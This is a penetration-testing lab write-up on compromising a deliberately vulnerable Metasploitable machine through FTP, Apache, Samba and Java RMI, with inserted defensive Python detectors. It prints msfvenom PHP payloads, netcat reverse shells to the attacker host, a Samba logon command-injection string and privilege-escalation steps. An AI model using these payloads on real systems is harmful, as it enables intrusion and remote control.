Metasploitable (Custom 1)
This is a custom vulnerable machine for a penetration testing module. I had to use the provided leaked information to perform the tasks and gain root privileges within a set time limit.

This documentation covers both the failed and the successful attempts to exploit the vulnerable custom machine.
Recon: N/A
Reconnaissance was not needed as I was provided with the following leaked credentials:
Username: xxxx
Password: xxxx
Scanning: Nmap
The target IP address was 192.168.249.147. The following Nmap flags were used:
-p-: All ports
--open: Only show open (or possibly open) ports
-sV: Probe open ports to determine service/version info
-A: Enable OS detection, version detection, script scanning, and traceroute
-O: Enable OS detection
-vvvv: Increase verbosity level (use -vv or more for greater effect)
-oA: Output in the three major formats at once

Nmap took 135.55 seconds (about 2.25 minutes), which wasn't too long at all given the flags used, to find the following information:
Enumeration: "Failed" FTP (NSE)
For enumeration, I will use the Nmap Scripting Engine (NSE) to search the two FTP services for any additional information:
nmap -sV -p 2121 192.168.249.147 --script=ftp-proftpd-backdoor
nmap -sV -p 21 192.168.249.147 --script=ftp-vsftpd-backdoor
nmap -sV -p 21 192.168.249.147 --script=ftp-brute
nmap -sV -p 2121 192.168.249.147 --script=ftp-brute
I wasn't able to find any additional information using NSE.
Exploitation: "Failed" FTP (Msfconsole)
Using the information from the Nmap scan results, I can attempt to access the two FTP ports.
There is a hint that port 21 (vsftpd) is not working. However, I will still try it with Msfconsole just to make sure.
Execute msfconsole:
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
options
set rhosts 192.168.249.147 <target IP>
run
True enough, no session was created. I will try port 2121 (ProFTPD) and see how it goes:
search proftp
However, the results were not ideal, as there isn't a module for ProFTPD version 1.3.1.

Exploitation: "It Worked" FTP (Login) / Apache
The following leaked information was provided for this exercise:
Username: xxxx
Password: xxxx
We have the following two FTP ports to explore.
I will try to connect to the default FTP port 21 first:
ftp 192.168.249.147
It returned the following errors:
Next, I will try to connect to FTP port 2121:
ftp 192.168.249.147 2121
Let me check which remote directory I have logged into:
pwd
I will execute 'ls' to list the available files and directories:
ls
There is an 'index.html', and earlier I noticed that port 80 is running the Apache service.
I can download the index.html file using FTP's 'get' command to check whether its content is the same as what I get when accessing the target IP address with the 'curl' command or a browser:
get index.html
After downloading the index.html file, I can execute the 'cat' command to see its contents:
cat index.html
Next, I will execute the 'curl' command to fetch the page from the target IP for comparison:
curl 192.168.249.147
Both results are identical!

The default directory for the Apache service should be /var/www/html. However, on this machine it was configured to the /home/xxxx directory instead, as we discovered earlier.
Reference: https://httpd.apache.org/docs/trunk/getting-started.html#content
Exploitation: "It Worked" FTP / Apache (Msfvenom Payload)
First, I will check what PHP payloads are available in Msfvenom:
msfvenom -l payloads | grep php
I will take a look at the options for the 'php/meterpreter_reverse_tcp' payload:
msfvenom -p php/meterpreter_reverse_tcp --list-options
I will proceed to create a payload named 'payload.php' with Msfvenom:
msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.249.140 lport=5566 -f raw -o payload.php
Next, I will connect to the target over FTP and upload the 'payload.php' file using the 'put' command:
put payload.php
Execute 'ls' to confirm that the payload has been uploaded successfully:
ls
Exploitation: "Failed" Listener (Msfconsole)
I will fire up Msfconsole to create a listener:
msfconsole
use exploit/multi/handler
I need to set the payload to match the one I generated with Msfvenom:
set payload /php/meterpreter_reverse_tcp
set lhost 192.168.249.140
set lport 5566
options
run

To execute the payload, I simply visit the URL 192.168.249.147/payload.php as shown in Figure 2, or execute 'curl 192.168.249.147/payload.php'.
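The chain just described (a script uploaded over FTP into the directory Apache serves, then requested over HTTP so the interpreter runs it) is what a defender would want to detect; the same pattern is repeated later in this write-up with 'phpexec.php'. The following is an added example, not code from this write-up: it parses constructed xferlog lines (the transfer log format vsftpd and ProFTPD write) and constructed Apache access log lines, and raises an alert when a script file recorded with direction 'i' (incoming) is later requested over HTTP. The host, user, file names and timestamps are assumed sample values, and xferlog times are treated as UTC for the comparison.

```python
"""Detect 'upload over FTP, then request over HTTP' from two log sources.
Added example, not part of the write-up; every log line below is constructed."""
import re
from datetime import datetime, timezone

# Constructed xferlog lines. The 9th field is the direction: 'i' = incoming
# (upload), 'o' = outgoing (download). Paths are the assumed Apache docroot.
XFERLOG = """\
Tue Mar 12 10:15:02 2024 1 192.168.249.140 512 /home/xxxx/notes.txt a _ i r xxxx ftp 0 * c
Tue Mar 12 10:15:40 2024 1 192.168.249.140 1126 /home/xxxx/payload.php b _ i r xxxx ftp 0 * c
Tue Mar 12 10:16:01 2024 1 192.168.249.140 2048 /home/xxxx/index.html b _ o r xxxx ftp 0 * c
"""

# Constructed Apache combined-format access log lines.
ACCESS_LOG = """\
192.168.249.140 - - [12/Mar/2024:10:14:55 +0000] "GET / HTTP/1.1" 200 2048 "-" "curl/8.5.0"
192.168.249.140 - - [12/Mar/2024:10:16:30 +0000] "GET /payload.php HTTP/1.1" 200 0 "-" "curl/8.5.0"
192.168.249.140 - - [12/Mar/2024:10:16:45 +0000] "GET /notes.txt HTTP/1.1" 200 512 "-" "curl/8.5.0"
"""

# Extensions a web server typically hands to an interpreter instead of serving as text.
SCRIPT_EXTENSIONS = (".php", ".phtml", ".phar", ".cgi", ".pl", ".py")

XFER_RE = re.compile(
    r"^(?P<when>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) (?P<secs>\d+) (?P<host>\S+) "
    r"(?P<size>\d+) (?P<path>\S+) (?P<type>[ab]) (?P<flag>\S) (?P<dir>[io]) "
    r"(?P<mode>[ar]) (?P<user>\S+) (?P<service>\S+) (?P<auth>\d) (?P<uid>\S+) (?P<status>[ci])$"
)
ACCESS_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r"(?P<status>\d{3}) \S+"
)


def parse_xferlog(text):
    """Yield one dict per xferlog record; 'ts' is an aware datetime (assumed UTC)."""
    for line in text.splitlines():
        m = XFER_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["ts"] = datetime.strptime(rec["when"], "%a %b %d %H:%M:%S %Y").replace(
                tzinfo=timezone.utc)
            yield rec


def parse_access_log(text):
    """Yield one dict per Apache access log record with an aware 'ts'."""
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["ts"] = datetime.strptime(rec["when"], "%d/%b/%Y:%H:%M:%S %z")
            yield rec


def find_upload_then_execute(xferlog_text, access_text):
    """Return alerts for script files uploaded over FTP. An upload that was
    later requested over HTTP is 'high'; an upload with no request yet is
    'medium', since the file is still a foothold waiting to be triggered."""
    uploads = [r for r in parse_xferlog(xferlog_text)
               if r["dir"] == "i" and r["path"].lower().endswith(SCRIPT_EXTENSIONS)]
    requests = list(parse_access_log(access_text))
    alerts = []
    for up in uploads:
        name = up["path"].rsplit("/", 1)[-1]
        # Match on the file name only: the FTP path is on disk, the HTTP path is the URL.
        hits = [rq for rq in requests
                if rq["path"].split("?", 1)[0].rsplit("/", 1)[-1] == name and rq["ts"] >= up["ts"]]
        alert = {"file": up["path"], "ftp_user": up["user"], "uploader": up["host"]}
        if hits:
            alert.update(severity="high", requested_by=hits[0]["client"],
                         http_status=hits[0]["status"])
        else:
            alert.update(severity="medium", requested_by=None, http_status=None)
        alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in find_upload_then_execute(XFERLOG, ACCESS_LOG):
        print(alert)
```

Only the '.php' upload is flagged: 'notes.txt' is not a script and 'index.html' was a download, not an upload. In a real deployment the same correlation would also want the FTP home directory compared against Apache's DocumentRoot, which is the misconfiguration that made this chain possible here.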
I will proceed to examine the Meterpreter session that I gained:
getuid
sysinfo
The 'www-data' user has low privileges, so I will need to escalate privileges.
I will try Msfconsole's suggester to see if there are any potential exploits available.
First, I will send the Meterpreter session to the background:
background
search suggester
I will use the 'suggester' and point it at the Meterpreter session, which is session 1:
use post/multi/recon/local_exploit_suggester
set session 1
options
run
No suggestions were available and the Meterpreter session closed. It seems the session was not a stable one.
Note: if the output error is 'segmentation fault', it could be due to using a staged payload such as 'linux/x86/shell/reverse_tcp' instead of a stageless payload such as 'linux/x86/shell_reverse_tcp'.
Reference: https://github.com/rapid7/metasploit-framework/issues/12142#issuecomment-516057212
Exploitation: "Succeeded" FTP / Apache (Msfvenom Payload)
I will use the 'php/exec' payload with Msfvenom next:
msfvenom -p php/exec cmd='nc 192.168.249.140 7777 -e /bin/sh' lhost=192.168.249.140 lport=7777 -f raw -o phpexec.php
I will upload the 'phpexec.php' payload via FTP port 2121 using the leaked credentials from earlier:
ftp 192.168.249.147 2121
put phpexec.php
Exploitation: "Succeeded" Listener (Msfconsole)
Start msfconsole, use the handler exploit, set the payload and run it. The process is the same as in the earlier example:
msfconsole
use exploit/multi/handler
set payload linux/x86/shell_reverse_tcp
set lhost 192.168.249.140
set lport 7777
options
run

After the reverse TCP handler has started, I visit the URL of 'phpexec.php' to trigger the payload, as shown in Figure 3, or execute 'curl 192.168.249.147/phpexec.php'.
I gained a command shell session. I executed the 'whoami' command to check the user name:
whoami
I will need to escalate privileges as the current user is 'www-data'.
I sent the command shell session to the background, then searched for and used the 'suggester':
search suggester
use post/multi/recon/local_exploit_suggester
set session 1
options
run
I will use 'exploit/linux/local/glibc_ld_audit_dso_load_priv_esc' from the list and set the payload to use:
use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.249.140
set lport 7777
set session 1
options
run
getuid
sysinfo
Finally managed to gain the 'root' user!
Enumeration: "It Worked" Samba (SMBmap)
I will use SMBmap to scan the target's Samba port for potential information:
smbmap -H 192.168.249.147 -P 139
smbmap showed that there is a 'tmp' share with 'Read, Write' permissions.
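A writable share that unauthenticated users can reach is a misconfiguration a defender can catch in smb.conf before smbmap reports it. The following is an added example, not part of this write-up: a small audit of smb.conf text that flags shares which are writable and open to guests, and a [global] 'map to guest' setting that turns failed logins into guest sessions. Both configurations are constructed; the weak one models the 'tmp' finding above and the hardened one shows the corrected settings.

```python
"""Audit smb.conf text for writable shares reachable without credentials.
Added example, not code from the write-up; both configs are constructed."""
import re

# Constructed weak configuration modelled on the smbmap finding above.
WEAK_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   security = user
   map to guest = Bad User

[tmp]
   path = /tmp
   guest ok = yes
   writable = yes
   comment = scratch space

[homes]
   browseable = no
   read only = no
"""

# Constructed hardened variant: no guest mapping, scratch share read-only
# and authenticated.
HARDENED_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   security = user
   map to guest = Never

[tmp]
   path = /tmp
   guest ok = no
   read only = yes
"""

TRUE_VALUES = {"yes", "true", "1"}


def parse_smb_conf(text):
    """Return {section: {key: value}}; keys and values are lower-cased,
    since Samba treats parameter names case-insensitively."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        sections[current][key.lower()] = value.lower()
    return sections


def is_writable(share):
    """'writable'/'writeable' is the inverse of 'read only'; Samba's default
    when neither is present is read only = yes."""
    for key in ("writable", "writeable"):
        if key in share:
            return share[key] in TRUE_VALUES
    if "read only" in share:
        return share["read only"] not in TRUE_VALUES
    return False


def allows_guest(share):
    """'guest ok' (synonym 'public') lets clients use the share without a password."""
    for key in ("guest ok", "public"):
        if key in share:
            return share[key] in TRUE_VALUES
    return False


def audit_smb_conf(text):
    """Return a list of (section, finding) tuples; an empty list means nothing was flagged."""
    sections = parse_smb_conf(text)
    findings = []
    map_to_guest = sections.get("global", {}).get("map to guest", "never")
    if map_to_guest != "never":
        findings.append(("global", "map to guest = %s turns failed logins into guest sessions"
                         % map_to_guest))
    for name, share in sections.items():
        if name == "global":
            continue
        if is_writable(share) and allows_guest(share):
            findings.append((name, "writable by unauthenticated clients"))
        elif is_writable(share):
            findings.append((name, "writable (authenticated)"))
    return findings


if __name__ == "__main__":
    for conf in (WEAK_SMB_CONF, HARDENED_SMB_CONF):
        print(audit_smb_conf(conf) or "no findings")
```

Run against the weak configuration this reports the 'tmp' share as writable by unauthenticated clients, the [homes] share as writable for authenticated users, and the 'map to guest' setting; the hardened configuration produces no findings. Real Samba configurations use 'include' and per-share overrides that this small parser does not follow, so treat it as a first pass rather than a full policy check.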
Exploitation: "Succeeded" Samba (NC / SMBClient)
Use smbclient to check for anonymous login access:
smbclient -L 192.168.249.147
Press 'Enter' when prompted for a password.
Start a listener:
nc -nlvp 5566
Open another terminal window and access the target's 'tmp' share:
smbclient //192.168.249.147/tmp

Figure 4 above shows the two open terminals:
Left terminal: listener
Right terminal: smbclient
Execute the following 'logon' command to make a reverse shell connection:
logon "/=`nc 192.168.249.140 5566 -e /bin/bash`"
Press 'Enter' when prompted for a password.
The netcat terminal will receive a connection with a shell session:
whoami
It returned a shell session, and executing 'whoami' displayed the 'root' user.
Exploitation: "Succeeded" Samba (Msfconsole)
search Samba 3.0.20

The above result did not mention the exact Samba 3.0.20 version. However, I will give it a try since it is ranked 'excellent'.
options
set lport 5566 (I usually do not use the default 4444)
set lhost 192.168.249.140 <localhost IP>
set rhosts 192.168.249.147 <target IP>
run
whoami
It returned a shell session, and executing 'whoami' displayed the 'root' user.
Executing the following command will give a 'prettier' shell session:
python -c 'import pty; pty.spawn("/bin/bash")'
Exploitation: "Blunder" Java RMI (Msfconsole)
I had restarted the target machine, but I was still using the previous Nmap scan results to try to exploit port 50981, which had been running the Java RMI service:
set rport 50981
I kept getting the following error no matter how I changed the parameters in the options, and I was totally clueless as to what went wrong. It had worked perfectly the other day when I exploited it.

Exploitation: "Succeeded" Java RMI (Msfconsole)
After a good 20-30 minutes of going round in circles, I decided to give it a last shot by performing another Nmap scan:
nmap -sV -p- --open 192.168.249.147
Mystery solved: the port had changed to 56886.
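The -oA flag used in the scanning section writes a grepable .gnmap file alongside the normal and XML outputs, and diffing the old and new .gnmap files would have shown the moved port straight away; the same diff is how a defender baselines a host and spots a new or moved service. The following is an added example, not code from this write-up: it parses the Ports field of constructed .gnmap records, diffs a 'before' and an 'after' scan, and pairs each removed port with an added port advertising the same service. The two scan records and their version strings are constructed samples, not the write-up's actual scan output.

```python
"""Parse Nmap grepable (.gnmap) output and diff two scans of the same host.
Added example, not code from the write-up; both scan records are constructed."""
import re

# Constructed .gnmap records: before and after the target reboot. The Ports
# field is a comma list of port/state/proto/owner/service/rpcinfo/version/.
SCAN_BEFORE = """\
# Nmap scan initiated (constructed sample)
Host: 192.168.249.147 ()\tStatus: Up
Host: 192.168.249.147 ()\tPorts: 21/open/tcp//ftp//vsftpd/, 80/open/tcp//http//Apache httpd/, 139/open/tcp//netbios-ssn//Samba smbd 3.0.20/, 2121/open/tcp//ftp//ProFTPD 1.3.1/, 50981/open/tcp//java-rmi//Java RMI/\tIgnored State: closed (65531)
"""
SCAN_AFTER = """\
Host: 192.168.249.147 ()\tPorts: 21/open/tcp//ftp//vsftpd/, 80/open/tcp//http//Apache httpd/, 139/open/tcp//netbios-ssn//Samba smbd 3.0.20/, 2121/open/tcp//ftp//ProFTPD 1.3.1/, 56886/open/tcp//java-rmi//Java RMI/\tIgnored State: closed (65531)
"""

# Seven slash-separated fields; the version may itself contain '/', so it is matched last and greedily.
PORT_RE = re.compile(r"^(\d+)/(\w+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/(.*)/$")


def parse_gnmap(text):
    """Return {host: {port: (proto, service, version)}} for open ports only."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        # Tab-separated "Name: value" fields: Host, Ports, Ignored State, Status...
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        host = fields["Host"].split()[0]
        ports = fields.get("Ports")
        if not ports:
            continue  # the Status line carries no port data
        for entry in ports.split(", "):
            m = PORT_RE.match(entry.strip())
            if not m:
                continue
            port, state, proto, _owner, service, _rpc, version = m.groups()
            if state == "open":
                hosts.setdefault(host, {})[int(port)] = (proto, service, version)
    return hosts


def diff_scans(old, new):
    """Return {host: {'added': ..., 'removed': ..., 'changed': ...}} for hosts that differ."""
    report = {}
    for host in sorted(set(old) | set(new)):
        o, n = old.get(host, {}), new.get(host, {})
        added = {p: n[p] for p in n if p not in o}
        removed = {p: o[p] for p in o if p not in n}
        changed = {p: (o[p], n[p]) for p in o if p in n and o[p] != n[p]}
        if added or removed or changed:
            report[host] = {"added": added, "removed": removed, "changed": changed}
    return report


def moved_services(host_diff):
    """Pair each removed port with an added port offering the same proto/service:
    a service bound to a dynamic port that came back elsewhere after a restart."""
    moves = []
    for old_port, (proto, service, _v) in host_diff["removed"].items():
        for new_port, (nproto, nservice, _nv) in host_diff["added"].items():
            if (proto, service) == (nproto, nservice):
                moves.append((service, old_port, new_port))
    return moves


if __name__ == "__main__":
    before, after = parse_gnmap(SCAN_BEFORE), parse_gnmap(SCAN_AFTER)
    for host, host_diff in diff_scans(before, after).items():
        print(host, host_diff)
        print("moved:", moved_services(host_diff))
```

On the two constructed records the diff reports 50981 removed and 56886 added, and the pairing step labels that as the java-rmi service having moved. Services that bind an ephemeral port at startup are exactly the ones worth re-scanning after any reboot, whether you are attacking the box in a lab or maintaining an inventory of it.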
Hence I started Msfconsole, searched for the exploit and ran it:
msfconsole
search type:exploit java rmi
use exploit/multi/misc/java_rmi_server
set rhosts 192.168.249.147
set rport 56886
set lhost 192.168.249.140
set lport 5566
options
run
I am getting the following errors:
However, it did mention that 'Meterpreter session 1 opened'. Hence, I executed 'sessions' just to check whether there was indeed one:
sessions
sessions 1
getuid
sysinfo
Executing 'getuid' showed that the server username is 'root'!